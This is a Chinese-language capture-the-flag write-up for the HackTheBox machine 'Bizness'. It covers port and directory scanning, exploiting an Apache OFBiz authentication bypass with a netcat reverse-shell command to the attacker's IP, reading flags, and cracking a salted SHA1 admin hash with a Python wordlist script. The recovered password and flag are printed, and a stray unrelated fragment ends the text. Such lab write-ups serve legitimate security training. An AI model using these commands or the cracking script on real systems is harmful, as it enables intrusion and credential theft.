目錄
信息收集
nmap
dirsearch
WEB
Get shell
提權
get user flag
get root flag
信息收集
nmap
端口掃描┌──(root?ru)-[~/kali/hackthebox]
└─# nmap -p- 10.10.11.252 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 11:44 CST
Warning: 10.10.11.252 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.252
Host is up (0.25s latency).
Not shown: 64116 closed tcp ports (reset), 1415 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
46351/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 25.95 seconds┌──(root?ru)-[~/kali/hackthebox]
└─# cat port.nmap | head -10 | tail -4 | awk -F "/" '{print($1)}' | xargs -n 4 | sed 's/ /,/g'
22,80,443,46351版本服務信息探測┌──(root?ru)-[~/kali/hackthebox]
└─# nmap -sCV -O -A -p 22,80,443,46351 10.10.11.252 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-04 11:50 CST
Nmap scan report for 10.10.11.252
Host is up (0.30s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open ssl/http nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://bizness.htb/
| tls-nextprotoneg:
|_ http/1.1
|_http-server-header: nginx/1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
| tls-alpn:
|_ http/1.1
46351/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 256.88 ms 10.10.14.1
2 256.87 ms 10.10.11.252OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.09 seconds1、對ip進行端口掃描以及版本信息探測2、在本地host文件中加入 bizness.htb 以便訪問
dirsearch
┌──(root?ru)-[~/kali/hackthebox]
└─# dirsearch -u https://bizness.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/kali/hackthebox/reports/https_bizness.htb/__24-03-04_12-04-58.txtTarget: https://bizness.htb/[12:04:58] Starting:
[12:06:35] 200 - 11KB - /control/login
[12:06:35] 200 - 34KB - /control/
[12:06:35] 200 - 34KB - /control
[12:08:05] 200 - 21B - /solr/admin/
[12:08:05] 200 - 21B - /solr/admin/file/?file=solrconfig.xml/control/login
/solr/admin/
WEB
主頁沒啥好看的!
當我們訪問 /control/login 時,會跳轉到 Apache OFBiz 登錄頁面!
┌──(root?ru)-[~/kali/hackthebox]
└─# searchsploit OFBiz
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache OFBiz - Admin Creator | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution) | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) | java/webapps/50178.sh
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
經過搜索,該框架存在身份驗證繞過漏洞!我們利用payload!
Get shell
我們利用payload獲取shell┌──(root?ru)-[~/tools/vuln/Apache_OFBiz_vuln/Apache-OFBiz-Authentication-Bypass]
└─# python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.14.24 1234'
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.利用payload獲取shell!
使用nc進行監聽,成功獲取到shell!
提權
get user flag
首先我們使用python提高交互性whereis python
python3 -c 'import pty;pty.spawn("/bin/bash")'
ofbiz@bizness:~$ ls
ls
user.txt
ofbiz@bizness:~$ cat user.txt
cat user.txt
d28cd5d5d3e8a6db717e833a419b9b28
ofbiz@bizness:~$
get root flag
ofbiz@bizness:/$ ls -al /etc/passwd /etc/shadow
ls -al /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 1432 Dec 20 10:48 /etc/passwd
-rw-r----- 1 root shadow 896 Dec 20 10:48 /etc/shadow
ofbiz@bizness:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
經過一番搜索發現opt目錄下存在可疑文件!在 /opt/ofbiz/framework/resources/templates 目錄下存在 AdminUserLoginData.xml 文件!
{SHA}47ca69ebb4bdc9ae0adec130880165d2cc05db1a
/opt/ofbiz/runtime/data/derby/ofbiz/seg0 在這個目錄下查找到一些文件,查看特殊的文件發現 c54d0.dat 文件!
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2ISHA:加密算法
d:加鹽處理這里使用SHA算法加密的Hash,而且還進行了加鹽處理,因此我們無法逆運算得到明文。我們只能使用腳本進行解密了!
#python腳本!import hashlib
import base64
import os
from tqdm import tqdmclass PasswordEncryptor:def __init__(self, hash_type="SHA", pbkdf2_iterations=10000):"""使用哈希類型和PBKDF2迭代初始化PasswordEncryptor對象。:param hash_type:要使用的哈希算法(默認為SHA)。:param pbkdf2_iterations:pbkdf2的迭代次數(默認值為10000)。"""self.hash_type = hash_typeself.pbkdf2_iterations = pbkdf2_iterationsdef crypt_bytes(self, salt, value):"""使用指定的哈希類型和salt隱藏密碼。:param salt:加密中使用的salt。:param value:要加密的密碼值。:return:加密后的密碼字符串。"""if not salt:salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')hash_obj = hashlib.new(self.hash_type)hash_obj.update(salt.encode('utf-8'))hash_obj.update(value)hashed_bytes = hash_obj.digest()result = f"${self.hash_type}${salt}${base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')}"return resultdef get_crypted_bytes(self, salt, value):"""獲取密碼的加密字節。:param salt:加密中使用的salt。:param value:要為其獲取加密字節的密碼值。:return:以字符串形式加密的字節。"""try:hash_obj = hashlib.new(self.hash_type)hash_obj.update(salt.encode('utf-8'))hash_obj.update(value)hashed_bytes = hash_obj.digest()return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '.')except hashlib.NoSuchAlgorithmException as e:raise Exception(f"Error while computing hash of type {self.hash_type}: {e}")# Example usage:
hash_type = "SHA1"
salt = "d"
search = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
wordlist = '/usr/share/wordlists/rockyou.txt'# 創建PasswordEncryptor類的實例
encryptor = PasswordEncryptor(hash_type)# 獲取加載欄的單詞列表中的行數
total_lines = sum(1 for _ in open(wordlist, 'r', encoding='latin-1'))# 使用加載欄在單詞列表中循環,并檢查匹配的密碼
with open(wordlist, 'r', encoding='latin-1') as password_list:for password in tqdm(password_list, total=total_lines, desc="Processing"):value = password.strip()# 獲取加密密碼hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))# 與哈希進行比較if hashed_password == search:print(f'Found Password:{value}, hash:{hashed_password}')break # Stop the loop if a match is found
密碼:monkeybizness
get root and flag!
)
 指定點數的體素濾波)
